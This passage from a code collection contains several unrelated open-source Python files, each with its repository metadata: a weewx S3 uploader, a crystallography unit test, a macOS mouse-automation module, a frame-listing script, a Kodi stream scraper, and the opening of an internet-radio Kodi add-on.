html_root = self.config_dict['StdReport']['HTML_ROOT']
self.local_root = os.path.join(self.config_dict['WEEWX_ROOT'], html_root) + "/"
self.bucket_name = self.skin_dict['bucket_name']
self.logdbg("s3uploadgenerator: upload configured from '%s' to '%s'" % (self.local_root, self.bucket_name))
except KeyError as e:
self.loginf("s3uploadgenerator: no upload configured. %s" % e)
exit(1)
# Get full path to "s3cmd"; exit if not installed
path_proc = subprocess.Popen(["which", "s3cmd"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
self.s3cmd_path = path_proc.communicate()[0].decode().strip()
# 'which' returns an empty string if "s3cmd" not in $PATH
if self.s3cmd_path == '':
self.loginf("s3uploadgenerator: 's3cmd' cannot be found")
exit(1)
self.logdbg("s3uploadgenerator: s3cmd location: " + self.s3cmd_path)
self.logdbg("s3uploadgenerator: uploading")
# Launch in a separate thread so it doesn't block the main LOOP thread:
t = threading.Thread(target=self.uploadFiles)
t.start()
self.logdbg("s3uploadgenerator: return from upload thread")
    def uploadFiles(self):
        """Run ``s3cmd sync`` of local_root to the S3 bucket and log a summary.

        Runs in the worker thread started by run(). The output parsing
        matches s3cmd 1.6.1: one "upload: ..." line per file and a final
        "Done. Uploaded N bytes" line on success.
        """
        start_ts = time.time()
        t_str = timestamp_to_string(start_ts)
        self.logdbg("s3uploadgenerator: start upload at %s" % t_str)

        # Build s3cmd command string
        # NOTE(review): the credentials path is hard-coded -- consider making
        # it configurable.
        cmd = [self.s3cmd_path]
        cmd.extend(["sync"])
        cmd.extend(["--config=/home/weewx/.s3cfg"])
        cmd.extend([self.local_root])
        cmd.extend(["s3://%s" % self.bucket_name])

        self.logdbg("s3uploadgenerator: command: %s" % cmd)

        try:
            S3upload_cmd = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            # communicate() yields bytes; stderr is merged into stdout above.
            stdout = S3upload_cmd.communicate()[0]
            stroutput = stdout.strip()
        except OSError as e:
            if e.errno == errno.ENOENT:
                self.logerr("s3uploadgenerator: s3cmd does not appear to be installed on this system. (errno %d, \"%s\")" % (e.errno, e.strerror))
            raise

        if weewx.debug == 1:
            self.logdbg("s3uploadgenerator: s3cmd output: %s" % stroutput)
            for line in iter(stroutput.splitlines()):
                self.logdbg("s3uploadgenerator: s3cmd output: %s" % line)

        # S3upload output. generate an appropriate message
        if stroutput.find(b'Done. Uploaded ') >= 0:
            # Successful sync: count uploaded files and pull out the byte total.
            file_cnt = 0
            for line in iter(stroutput.splitlines()):
                # Not sure what a specific upload failure looks like.
                # This is what s3cmd version 1.6.1 returns on successful upload.
                # Note that this is from the Debian repos and is ooolllldddd
                if line.find(b'upload: ') >= 0:
                    file_cnt += 1
                if line.find(b'Done. Uploaded ') >= 0:
                    # get number of bytes uploaded
                    m = re.search(r"Uploaded (\d*) bytes", str(line))
                    if m:
                        byte_cnt = int(m.group(1))
                    else:
                        byte_cnt = "Unknown"

            # format message -- the doubled %% leaves a literal %0.2f
            # placeholder that is filled in with the elapsed time below.
            try:
                if file_cnt is not None and byte_cnt is not None:
                    S3upload_message = "uploaded %d files (%s bytes) in %%0.2f seconds" % (int(file_cnt), byte_cnt)
                else:
                    S3upload_message = "executed in %0.2f seconds"
            except:
                S3upload_message = "executed in %0.2f seconds"
        else:
            # suspect we have an s3cmd error so display a message
            self.loginf("s3uploadgenerator: s3cmd reported errors")
            for line in iter(stroutput.splitlines()):
                self.loginf("s3uploadgenerator: s3cmd error: %s" % line)
            S3upload_message = "executed in %0.2f seconds"

        stop_ts = time.time()
        self.loginf("s3uploadgenerator: results: " + S3upload_message % (stop_ts - start_ts))
        t_str = timestamp_to_string(stop_ts)
        self.logdbg("s3uploadgenerator: end upload at %s" % t_str)
if __name__ == '__main__':
    """This section is used for testing the code. """
    # NOTE(review): exits immediately, so everything below is dead code
    # (and, per the author's own comment, broken) -- kept for reference.
    exit(0)
    # Note that this fails!
    import sys
    import configobj
    from optparse import OptionParser

    usage_string = """Usage:
    S3upload.py config_path

    Arguments:
    config_path: Path to weewx.conf"""

    parser = OptionParser(usage=usage_string)
    (options, args) = parser.parse_args()

    if len(args) < 1:
        sys.stderr.write("Missing argument(s).\n")
        sys.stderr.write(parser.parse_args(["--help"]))
        exit()

    config_path = args[0]

    weewx.debug = 1

    try :
        config_dict = configobj.ConfigObj(config_path, file_error=True)
    except IOError:
        print ("Unable to open configuration file ", config_path)
        exit()

    if 'S3upload' not in config_dict:
        # NOTE(review): Python-2 print-chevron syntax; unreachable under
        # Python 3 only because of the exit(0) above.
        print >>sys.stderr, "No [S3upload] section in the configuration file %s" % config_path
        exit(1)

    engine = None
    S3upload = uploadFiles(engine, config_dict)

    rec = {'extraTemp1': 1.0,
           'outTemp': 38.2,
           'dateTime': int(time.time())}

    event = weewx.Event(weewx.NEW_ARCHIVE_RECORD, record=rec)
    S3upload.newArchiveRecord(event)
|
wmadill/weewx-S3upload
|
bin/user/S3upload.py
|
Python
|
gpl-2.0
| 8,164
|
from __future__ import print_function
from ImageD11.indexing import ubi_fit_2pks
from ImageD11.unitcell import unitcell
import numpy as np
import time
import unittest, cProfile, pstats
def make_random_orientations( N ):
    """Return N random rotation matrices with shape (N, 3, 3).

    Quaternions drawn from a standard normal distribution are uniformly
    distributed in direction, so converting them gives uniformly random
    orientations.
    """
    quats = np.random.standard_normal( (4, N) )
    # 1/|q|^2 normalisation folded into the conversion formula below.
    scale = 1/(quats*quats).sum( axis=0 )
    w, x, y, z = quats
    mats = np.zeros( (N, 3, 3), float )
    mats[:,0,0] = 1 - 2*scale*(y*y + z*z)
    mats[:,0,1] = 2*scale*(x*y - z*w)
    mats[:,0,2] = 2*scale*(x*z + y*w)
    mats[:,1,0] = 2*scale*(x*y + z*w)
    mats[:,1,1] = 1 - 2*scale*(x*x + z*z)
    mats[:,1,2] = 2*scale*(y*z - x*w)
    mats[:,2,0] = 2*scale*(x*z - y*w)
    mats[:,2,1] = 2*scale*(y*z + x*w)
    mats[:,2,2] = 1 - 2*scale*(x*x + y*y)
    return mats
class test_2pks( unittest.TestCase ):
    """Check that ubi_fit_2pks refines a deliberately wrong UBI so that two
    indexed g-vectors land exactly on integer hkl."""

    def setUp(self):
        # Ideal lattice parameters and one random orientation shared by
        # both the tetragonal and hexagonal cases.
        self.a = 6
        self.c = 5
        self.U = make_random_orientations( 1 )[0]

    def _check_fit(self, gamma):
        """Run the two-peak fit for a cell with unit-cell angle *gamma*.

        A perturbed cell (a 5% too long, c 5% too short) generates two
        g-vectors which are then indexed against the ideal cell; the
        unfitted UBI must leave a non-zero hkl residual (drlv) while the
        fitted one must drive it to ~0.
        """
        a, c = self.a, self.c
        cell = unitcell( [ a*1.05, a*1.05, c*0.95, 90., 90., gamma], "P" )
        ub = np.dot( self.U, cell.B )
        h1 = (1,0,0)
        h2 = (0,0,1)
        g1 = np.dot( ub, h1 ) # a calc, wrong
        g2 = np.dot( ub, h2 ) # c
        ideal = unitcell( [ a, a, c, 90., 90., gamma], "P" )
        ideal.makerings(0.3)
        ideal.orient( 0, g1, 1, g2 )
        gve = np.vstack( (g1 , g2) ).T
        for ubi in ideal.UBIlist:
            ufit = ubi_fit_2pks( ubi, g1, g2 )
            hold = np.dot( ubi, gve )
            drlvold = abs(hold - np.round(hold)).sum()
            hnew = np.dot( ufit, gve )
            drlvnew = abs(hnew - np.round(hnew)).sum()
            # Residual present before the fit, gone after it.
            self.assertTrue( drlvold > 0 )
            self.assertAlmostEqual( drlvnew, 0 )

    def test_tetragonal(self):
        # gamma = 90 degrees.
        self._check_fit( 90. )

    def test_hexagonal(self):
        # gamma = 120 degrees.
        self._check_fit( 120. )


if __name__=="__main__":
    unittest.main()
|
jonwright/ImageD11
|
test/test_indexing.py
|
Python
|
gpl-2.0
| 2,698
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
# This file is part of ATOMac.
#@author: Nagappan Alagappan <nagappan@gmail.com>
#@copyright: Copyright (c) 2009-14 Nagappan Alagappan
#@author: Sigbjørn Vik <sigbjorn@opera.com>
#@Copyright (C) 2013-14 Opera Software ASA (generatemouseevent API).
#http://ldtp.freedesktop.org
# ATOMac is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by the Free
# Software Foundation version 2 and no later version.
# ATOMac is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License version 2
# for more details.
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin
# St, Fifth Floor, Boston, MA 02110-1301 USA.
"""Mouse class."""
import time
from Quartz import CGEventCreateMouseEvent,\
CGEventPost,\
kCGHIDEventTap,\
CGEventSetIntegerValueField,\
kCGMouseEventClickState,\
CGEventGetLocation,\
CGEventCreate
from Quartz import kCGEventMouseMoved as move
from Quartz import kCGEventLeftMouseDown as press_left
from Quartz import kCGEventLeftMouseUp as release_left
from Quartz import kCGEventLeftMouseDragged as drag_left
from Quartz import kCGEventRightMouseDown as press_right
from Quartz import kCGEventRightMouseUp as release_right
from Quartz import kCGEventRightMouseDragged as drag_right
from Quartz import kCGEventOtherMouseDown as press_other
from Quartz import kCGEventOtherMouseUp as release_other
from Quartz import kCGEventOtherMouseDragged as drag_other
from Quartz import kCGMouseButtonLeft as left
from Quartz import kCGMouseButtonRight as right
from Quartz import kCGMouseButtonCenter as centre
from utils import Utils
from server_exception import LdtpServerException
# Click counts written into the kCGMouseEventClickState field.
single_click = 1
double_click = 2
triple_click = 3
# Sentinel meaning "no explicit drag button override was requested".
drag_default_button = 100

# Global value to remember if any button should be down during moves
drag_button_remembered = None

# String names accepted from clients, mapped onto the Quartz event-type /
# button constants imported above (plus the sentinel).
mouse_click_override = {'single_click': single_click, 'double_click': double_click,
                        'triple_click': triple_click, 'move': move,
                        'press_left': press_left, 'release_left': release_left,
                        'drag_left': drag_left, 'press_right': press_right,
                        'release_right': release_right, 'drag_right': drag_right,
                        'press_other': press_other, 'release_other': release_other,
                        'drag_other': drag_other, 'left': left, 'right': right,
                        'centre': centre, 'drag_default_button': drag_default_button}
class Mouse(Utils):
    """LDTP mouse primitives for OS X: object-relative clicks via the
    accessibility API and co-ordinate events via Quartz event taps."""

    def mouseleftclick(self, window_name, object_name):
        """
        Mouse left click on an object.

        @param window_name: Window name to look for, either full name,
        LDTP's name convention, or a Unix glob.
        @type window_name: string
        @param object_name: Object name to look for, either full name,
        LDTP's name convention, or a Unix glob. Or menu heirarchy
        @type object_name: string

        @return: 1 on success.
        @rtype: integer
        """
        object_handle = self._get_object_handle(window_name, object_name)
        if not object_handle.AXEnabled:
            raise LdtpServerException(u"Object %s state disabled" % object_name)
        self._grabfocus(object_handle)
        x, y, width, height = self._getobjectsize(object_handle)
        # Click the centre of the object.
        object_handle.clickMouseButtonLeft((x + width / 2, y + height / 2))
        return 1

    def mouserightclick(self, window_name, object_name):
        """
        Mouse right click on an object.

        @param window_name: Window name to look for, either full name,
        LDTP's name convention, or a Unix glob.
        @type window_name: string
        @param object_name: Object name to look for, either full name,
        LDTP's name convention, or a Unix glob. Or menu heirarchy
        @type object_name: string

        @return: 1 on success.
        @rtype: integer
        """
        object_handle = self._get_object_handle(window_name, object_name)
        if not object_handle.AXEnabled:
            raise LdtpServerException(u"Object %s state disabled" % object_name)
        self._grabfocus(object_handle)
        x, y, width, height = self._getobjectsize(object_handle)
        # Click the centre of the object.
        object_handle.clickMouseButtonRight((x + width / 2, y + height / 2))
        return 1

    def generatemouseevent(self, x, y, eventType="b1c",
                           drag_button_override='drag_default_button'):
        """
        Generate mouse event on x, y co-ordinates.

        @param x: X co-ordinate
        @type x: int
        @param y: Y co-ordinate
        @type y: int
        @param eventType: Mouse click type
        @type eventType: str
        @param drag_button_override: Any drag_xxx value
                                     Only relevant for movements, i.e. |type| = "abs" or "rel"
                                     Quartz is not fully compatible with windows, so for drags
                                     the drag button must be explicitly defined. generatemouseevent
                                     will remember the last button pressed by default, and drag
                                     that button, use this argument to override that.
        @type drag_button_override: str

        @return: 1 on success.
        @rtype: integer
        """
        if drag_button_override not in mouse_click_override:
            raise ValueError('Unsupported drag_button_override type: %s' % \
                             drag_button_override)
        global drag_button_remembered
        point = (x, y)
        button = centre  # Only matters for "other" buttons
        click_type = None
        if eventType == "abs" or eventType == "rel":
            # BUG FIX: was "drag_button_override is not 'drag_default_button'"
            # -- identity comparison against a string literal depends on
            # interning (and is a SyntaxWarning on modern Python); use !=.
            if drag_button_override != 'drag_default_button':
                events = [mouse_click_override[drag_button_override]]
            elif drag_button_remembered:
                # A button press is outstanding: move as a drag of it.
                events = [drag_button_remembered]
            else:
                events = [move]
            if eventType == "rel":
                # Offset from the current cursor position.
                point = CGEventGetLocation(CGEventCreate(None))
                point.x += x
                point.y += y
        elif eventType == "b1p":
            events = [press_left]
            drag_button_remembered = drag_left
        elif eventType == "b1r":
            events = [release_left]
            drag_button_remembered = None
        elif eventType == "b1c":
            events = [press_left, release_left]
        elif eventType == "b1d":
            events = [press_left, release_left]
            click_type = double_click
        elif eventType == "b2p":
            events = [press_other]
            drag_button_remembered = drag_other
        elif eventType == "b2r":
            events = [release_other]
            drag_button_remembered = None
        elif eventType == "b2c":
            events = [press_other, release_other]
        elif eventType == "b2d":
            events = [press_other, release_other]
            click_type = double_click
        elif eventType == "b3p":
            events = [press_right]
            drag_button_remembered = drag_right
        elif eventType == "b3r":
            events = [release_right]
            drag_button_remembered = None
        elif eventType == "b3c":
            events = [press_right, release_right]
        elif eventType == "b3d":
            events = [press_right, release_right]
            click_type = double_click
        else:
            raise LdtpServerException(u"Mouse event '%s' not implemented" % eventType)

        for event in events:
            CG_event = CGEventCreateMouseEvent(None, event, point, button)
            if click_type:
                # Mark the event as part of a multi-click sequence.
                CGEventSetIntegerValueField(
                    CG_event, kCGMouseEventClickState, click_type)
            CGEventPost(kCGHIDEventTap, CG_event)
            # Give the event time to happen
            time.sleep(0.01)
        return 1

    def mousemove(self, window_name, object_name):
        """
        Mouse move on an object.

        @param window_name: Window name to look for, either full name,
        LDTP's name convention, or a Unix glob.
        @type window_name: string
        @param object_name: Object name to look for, either full name,
        LDTP's name convention, or a Unix glob. Or menu heirarchy
        @type object_name: string

        @return: 1 on success.
        @rtype: integer
        """
        raise LdtpServerException("Not implemented")

    def doubleclick(self, window_name, object_name):
        """
        Double click on the object

        @param window_name: Window name to look for, either full name,
        LDTP's name convention, or a Unix glob.
        @type window_name: string
        @param object_name: Object name to look for, either full name,
        LDTP's name convention, or a Unix glob. Or menu heirarchy
        @type object_name: string

        @return: 1 on success.
        @rtype: integer
        """
        object_handle = self._get_object_handle(window_name, object_name)
        if not object_handle.AXEnabled:
            raise LdtpServerException(u"Object %s state disabled" % object_name)
        self._grabfocus(object_handle)
        x, y, width, height = self._getobjectsize(object_handle)
        window = self._get_front_most_window()
        # Mouse double click on the object
        #object_handle.doubleClick()
        window.doubleClickMouse((x + width / 2, y + height / 2))
        return 1

    def simulatemousemove(self, source_x, source_y, dest_x, dest_y, delay = 0.0):
        """
        @param source_x: Source X
        @type source_x: integer
        @param source_y: Source Y
        @type source_y: integer
        @param dest_x: Dest X
        @type dest_x: integer
        @param dest_y: Dest Y
        @type dest_y: integer
        @param delay: Sleep time between the mouse move
        @type delay: double

        @return: 1 if simulation was successful, 0 if not.
        @rtype: integer
        """
        raise LdtpServerException("Not implemented")
|
pyatom/pyatom
|
atomac/ldtpd/mouse.py
|
Python
|
gpl-2.0
| 10,473
|
#!/usr/bin/python2
import glob
# Scan the MC vertex output and report which datasets have only a setup
# frame and which have animation frames.
records = []
for base in (n[:-6] for n in glob.glob("figs/mc/vertices/*--1.dat")):
    # Frames with a positive frame number split into exactly six
    # '-'-separated pieces.
    frame_count = 0
    for path in glob.glob(base + "*"):
        if len(path.split('-')) == 6:
            frame_count += 1
    fields = base.split('-')
    records.append(dict(celltype=fields[0].split('/')[-1],
                        ff=fields[1],
                        name=fields[3],
                        N=fields[4],
                        frames=frame_count))

records.sort(key=lambda rec: (rec['name'], rec['celltype'], rec['ff'],
                              rec['N'], rec['frames']))

# Column widths for aligned output.
namelen = max([len(rec['name']) for rec in records])
cellen = max([len(rec['celltype']) for rec in records])
Nlen = max([len(rec['N']) for rec in records])
fflen = max([len(rec['ff']) for rec in records])

print("Setup frame only:")
print("%*s %*s %*s %*s" % (namelen, "Name", cellen, "celltype", fflen, "ff", Nlen, "N"))
print("-------------------------------------------------")
for rec in records:
    if rec['frames'] == 0:
        print("%*s %*s %*s %*s" % (namelen, rec['name'], cellen, rec['celltype'], fflen, rec['ff'], Nlen, rec['N']))

print("\nAnimations:")
print("%*s %*s %*s %*s %s" % (namelen, "Name", cellen, "celltype", fflen, "ff", Nlen, "N", "frames"))
print("-----------------------------------------------------------")
for rec in records:
    if rec['frames'] > 0:
        print("%*s %*s %*s %*s %6s" % (namelen, rec['name'], cellen, rec['celltype'], fflen, rec['ff'], Nlen, rec['N'], rec['frames']))
|
droundy/deft
|
papers/polyhedra/figs/list-frames.py
|
Python
|
gpl-2.0
| 1,462
|
# -*- coding: UTF-8 -*-
import json
import re
import urllib
import urlparse
import base64
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import directstream
from resources.lib.modules import dom_parser
from resources.lib.modules import source_utils
class source:
    """Stream scraper for tata.to (German site) in the standard "source"
    plugin shape: resolve an imdb id / title to a site URL, then extract
    direct stream links from the site's ajax endpoint."""

    def __init__(self):
        self.priority = 1
        self.language = ['de']
        self.domains = ['tata.to']

        self.base_link = 'http://tata.to'
        self.search_link = '/filme?suche=%s&type=alle'
        self.ajax_link = '/ajax/stream/%s'

    def movie(self, imdb, title, localtitle, aliases, year):
        # Movies can be searched directly by imdb id.
        try:
            url = self.__search_movie(imdb, year)
            return url if url else None
        except:
            return

    def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
        # Only pack the metadata into a query string here; the real lookup
        # happens per-episode in episode().
        try:
            url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'localtvshowtitle': localtvshowtitle, 'aliases': aliases, 'year': year}
            url = urllib.urlencode(url)
            return url
        except:
            return

    def episode(self, url, imdb, tvdb, title, premiered, season, episode):
        try:
            if not url:
                return

            data = urlparse.parse_qs(url)
            data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])

            tvshowtitle = data['tvshowtitle']
            localtvshowtitle = data['localtvshowtitle']
            # NOTE(review): eval() of the serialized alias list -- assumes the
            # string round-tripped through tvshow() above and is trusted.
            aliases = source_utils.aliases_to_array(eval(data['aliases']))

            # Prefer the year from the air date; fall back to the show year.
            year = re.findall('(\d{4})', premiered)
            year = year[0] if year else data['year']

            # Try the localized title (plus aliases) first, then the original.
            url = self.__search([localtvshowtitle] + aliases, year, season, episode)
            if not url and tvshowtitle != localtvshowtitle:
                url = self.__search([tvshowtitle] + aliases, year, season, episode)

            return url
        except:
            return

    def sources(self, url, hostDict, hostprDict):
        sources = []

        try:
            if not url:
                return sources

            ref = urlparse.urljoin(self.base_link, url)
            # The trailing "-<id>" of the page URL keys the ajax stream endpoint.
            url = urlparse.urljoin(self.base_link, self.ajax_link % re.findall('-(\w+)$', ref)[0])

            headers = {'Referer': ref, 'User-Agent': client.randomagent()}

            result = client.request(url, headers=headers, post='')
            # The response is base64-encoded JSON carrying a 'playinfo' payload.
            result = base64.decodestring(result)
            result = json.loads(result).get('playinfo', [])

            if isinstance(result, basestring):
                # Single HLS master playlist: fetch it and expand the variants.
                result = result.replace('embed.html', 'index.m3u8')

                base_url = re.sub('index\.m3u8\?token=[\w\-]+[^/$]*', '', result)

                r = client.request(result, headers=headers)
                # (height, relative variant URL) pairs from the master playlist.
                r = [(i[0], i[1]) for i in re.findall('#EXT-X-STREAM-INF:.*?RESOLUTION=\d+x(\d+)[^\n]+\n([^\n]+)', r, re.DOTALL) if i]
                r = [(source_utils.label_to_quality(i[0]), i[1] + source_utils.append_headers(headers)) for i in r]
                r = [{'quality': i[0], 'url': base_url + i[1]} for i in r]

                for i in r: sources.append({'source': 'CDN', 'quality': i['quality'], 'language': 'de', 'url': i['url'], 'direct': True, 'debridonly': False})
            elif result:
                # List of google-video mp4 links.
                result = [i.get('link_mp4') for i in result]
                result = [i for i in result if i]

                for i in result:
                    try: sources.append({'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'de', 'url': i, 'direct': True, 'debridonly': False})
                    except: pass

            return sources
        except:
            return

    def resolve(self, url):
        # URLs produced by sources() are already directly playable.
        return url

    def __search_movie(self, imdb, year):
        try:
            query = urlparse.urljoin(self.base_link, self.search_link % imdb)
            # Accept the given year +/- 1; '0' marks "year unknown".
            y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

            r = client.request(query)
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'container'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'ml-item-content'})
            r = [(dom_parser.parse_dom(i, 'a', attrs={'class': 'ml-image'}, req='href'), dom_parser.parse_dom(i, 'ul', attrs={'class': 'item-params'})) for i in r]
            r = [(i[0][0].attrs['href'], re.findall('calendar.+?>.+?(\d{4})', ''.join([x.content for x in i[1]]))) for i in r if i[0] and i[1]]
            r = [(i[0], i[1][0] if len(i[1]) > 0 else '0') for i in r]
            r = sorted(r, key=lambda i: int(i[1]), reverse=True)  # with year > no year
            r = [i[0] for i in r if i[1] in y][0]

            return source_utils.strip_domain(r)
        except:
            return

    def __search(self, titles, year, season=0, episode=False):
        try:
            query = self.search_link % (urllib.quote_plus(cleantitle.query(titles[0])))
            query = urlparse.urljoin(self.base_link, query)

            # Normalized candidate titles and acceptable years.
            t = [cleantitle.get(i) for i in set(titles) if i]
            y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

            r = client.request(query)
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'container'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'ml-item-content'})

            f = []
            for i in r:
                _url = dom_parser.parse_dom(i, 'a', attrs={'class': 'ml-image'}, req='href')[0].attrs['href']

                _title = re.sub('<.+?>|</.+?>', '', dom_parser.parse_dom(i, 'h6')[0].content).strip()
                # Strip a trailing "Staffel N" / "S N" season suffix.
                try: _title = re.search('(.*?)\s(?:staf+el|s)\s*(\d+)', _title, re.I).group(1)
                except: pass

                _season = '0'
                _year = re.findall('calendar.+?>.+?(\d{4})', ''.join([x.content for x in dom_parser.parse_dom(i, 'ul', attrs={'class': 'item-params'})]))
                _year = _year[0] if len(_year) > 0 else '0'

                if season > 0:
                    s = dom_parser.parse_dom(i, 'span', attrs={'class': 'season-label'})
                    s = dom_parser.parse_dom(s, 'span', attrs={'class': 'el-num'})
                    if s: _season = s[0].content.strip()

                if cleantitle.get(_title) in t and _year in y and int(_season) == int(season):
                    f.append((_url, _year))
            r = f
            r = sorted(r, key=lambda i: int(i[1]), reverse=True)  # with year > no year
            r = [i[0] for i in r if r[0]][0]

            url = source_utils.strip_domain(r)

            if episode:
                # Resolve the show page down to the requested episode link.
                r = client.request(urlparse.urljoin(self.base_link, url))
                r = dom_parser.parse_dom(r, 'div', attrs={'class': 'season-list'})
                r = dom_parser.parse_dom(r, 'li')
                r = dom_parser.parse_dom(r, 'a', req='href')
                r = [(i.attrs['href'], i.content) for i in r]
                r = [i[0] for i in r if i[1] and int(i[1]) == int(episode)][0]

                url = source_utils.strip_domain(r)

            return url
        except:
            return
|
repotvsupertuga/tvsupertuga.repository
|
script.module.streamtvsupertuga/lib/resources/lib/sources/de/tata.py
|
Python
|
gpl-2.0
| 7,124
|
#
# Copyright (C) 2013- Sean Poyser
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with XBMC; see the file COPYING. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import datetime
import os
import re
import sys
import time
import urllib
import urllib2

import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin

import quicknet
ADDONID = 'plugin.audio.ramfm'
ADDON = xbmcaddon.Addon(ADDONID)
HOME = ADDON.getAddonInfo('path')
TITLE = ADDON.getAddonInfo('name')
VERSION = ADDON.getAddonInfo('version')

# RSS feed listing the station's podcast episodes.
PODCASTS = 'http://www.spreaker.com/show/816525/episodes/feed'

ICON = os.path.join(HOME, 'icon.png')
FANART = os.path.join(HOME, 'fanart.jpg')
GETTEXT = ADDON.getLocalizedString

# Station .pls playlist; getURL() picks a concrete stream URL out of it.
URL = 'http://ramfm.org/ram.pls'

#Pls file
#NumberOfEntries=3
#File1=http://usa3-vn.mixstream.net:8018
#File2=http://uk2-vn.webcast-server.net:8018
#File3=http://uk1-vn.mixstream.net:9866
#Title1=RAM FM Eighties Hit Radio 64kbps AACP
#Title2=RAM FM Eighties Hit Radio 128kbps MP3
#Title3=RAM FM Eighties Hit Radio 192kbps MP3
#Version=2

# Dispatch modes; the _PLAYNOW_* values double as the stream bitrate.
_PLAYNOW_HI = 192
_PLAYNOW_MED = 128
_PLAYNOW_LO = 64
_REQUEST = 200
_LETTER = 300
_TRACK = 400
_RECORD = 500
_PODCASTS = 700
_PLAYPODCAST = 800

# Per-track modes used by the request browser.
MODE_FREE = 1000
MODE_SONG = 1100
MODE_ARTIST = 1200
MODE_IGNORE = 1300
def DialogOK(title, line1, line2, line3):
    """Show a modal OK dialog with a title and up to three lines of text."""
    dialog = xbmcgui.Dialog()
    dialog.ok(title, line1, line2, line3)
def CheckVersion():
    """Show the one-time 'what's new' dialog after an add-on upgrade."""
    prev = ADDON.getSetting('VERSION')
    curr = VERSION

    if prev == curr:
        return

    # Remember the new version so the dialog only appears once per upgrade.
    ADDON.setSetting('VERSION', curr)

    #if prev == '0.0.0':
    DialogOK(TITLE + ' - ' + VERSION, GETTEXT(30017), GETTEXT(30018), GETTEXT(30019)+' :-)')
def DownloaderClass(url, dest, dp):
    """Download *url* to file *dest*, animating progress dialog *dp*
    via the _pbhook report callback."""
    dp.update(0, GETTEXT(30020), dest, GETTEXT(30021))
    urllib.urlretrieve(url, dest, lambda nb, bs, fs: _pbhook(nb, bs, fs, dp))
def _pbhook(numblocks, blocksize, filesize, dp,):
    """urlretrieve report hook: animate *dp* and abort when cancelled.

    The live stream has no known length, so instead of a real percentage
    the bar just cycles (5% per block, modulo 100).
    """
    try:
        percent = (numblocks * 5) % 100
        dp.update(percent)
        #dp.update(0)
    except:
        pass

    # Raising propagates out of urlretrieve and stops the download;
    # Record() recognises the 'Canceled' message as a clean abort.
    if dp.iscanceled():
        raise Exception('Canceled')
def GetRecordPath():
    """Return the full destination path for a recording, or None if the
    user cancelled.

    The folder comes from the RECORD_FOLDER setting and/or a browse dialog
    (ASK_FOLDER); the filename from a keyboard prompt (ASK_FILENAME) or
    the add-on title. Filename-invalid characters are stripped and '.mp3'
    is appended.
    """
    downloadFolder = ADDON.getSetting('RECORD_FOLDER')

    if ADDON.getSetting('ASK_FOLDER') == 'true':
        dialog = xbmcgui.Dialog()
        downloadFolder = dialog.browse(3, GETTEXT(30022), 'files', '', False, False, downloadFolder)
        if downloadFolder == '':
            return None

    # BUG FIX: was "downloadFolder is ''" -- identity comparison against a
    # string literal is unreliable (always False for unicode results from
    # dialog.browse); use equality.
    if downloadFolder == '':
        # No folder configured: tell the user, open settings and re-read.
        DialogOK(TITLE, '', GETTEXT(30023), GETTEXT(30024))
        ADDON.openSettings()
        downloadFolder = ADDON.getSetting('RECORD_FOLDER')
        if downloadFolder == '' and ADDON.getSetting('ASK_FOLDER') == 'true':
            dialog = xbmcgui.Dialog()
            downloadFolder = dialog.browse(3, GETTEXT(30022), GETTEXT(30025), '', False, False, downloadFolder)
            if downloadFolder == '':
                return None

    if ADDON.getSetting('ASK_FILENAME') == 'true':
        kb = xbmc.Keyboard(TITLE, GETTEXT(30026))
        kb.doModal()
        if kb.isConfirmed():
            filename = kb.getText()
        else:
            return None
    else:
        filename = TITLE

    # Strip characters that are not allowed in filenames.
    filename = re.sub('[:\\/*?\<>|"]+', '', filename)
    filename = filename + '.mp3'

    return os.path.join(downloadFolder, filename)
def Record():
    """Record the live stream to an MP3 file chosen via GetRecordPath()."""
    dest = GetRecordPath()

    if dest == None or dest == '':
        return

    dp = xbmcgui.DialogProgress()
    dp.create(TITLE)

    try:
        DownloaderClass(getURL(), dest, dp)
    except Exception as e:
        # _pbhook raises 'Canceled' when the user aborts; not an error.
        if str(e) == 'Canceled':
            pass

    dp.close()
def Play():
    """Replace the music playlist with the live stream and start playback."""
    pl = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)
    pl.clear()
    pl.add(getURL())
    xbmc.Player().play(pl)
def PlayPodcast(name, link):
    """Play one podcast episode *link*, titled *name*, as an audio item."""
    # Anything after '"' is residue from the RSS enclosure attribute.
    link = link.split('"')[0]

    thumbnail = ICON#'DefaultPlaylist.png'

    liz = xbmcgui.ListItem(name, iconImage = thumbnail, thumbnailImage = thumbnail)
    liz.setInfo('music', {'Title': name})
    liz.setProperty('mimetype', 'audio/mpeg')
    liz.setProperty('IsPlayable', 'true')

    pl = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)
    pl.clear()
    pl.add(link, liz)

    xbmc.Player().play(pl)
def ShowPodcasts():
